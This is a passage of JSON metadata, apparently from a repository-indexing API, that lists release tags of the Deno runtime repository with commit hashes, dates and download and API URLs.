ithub/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,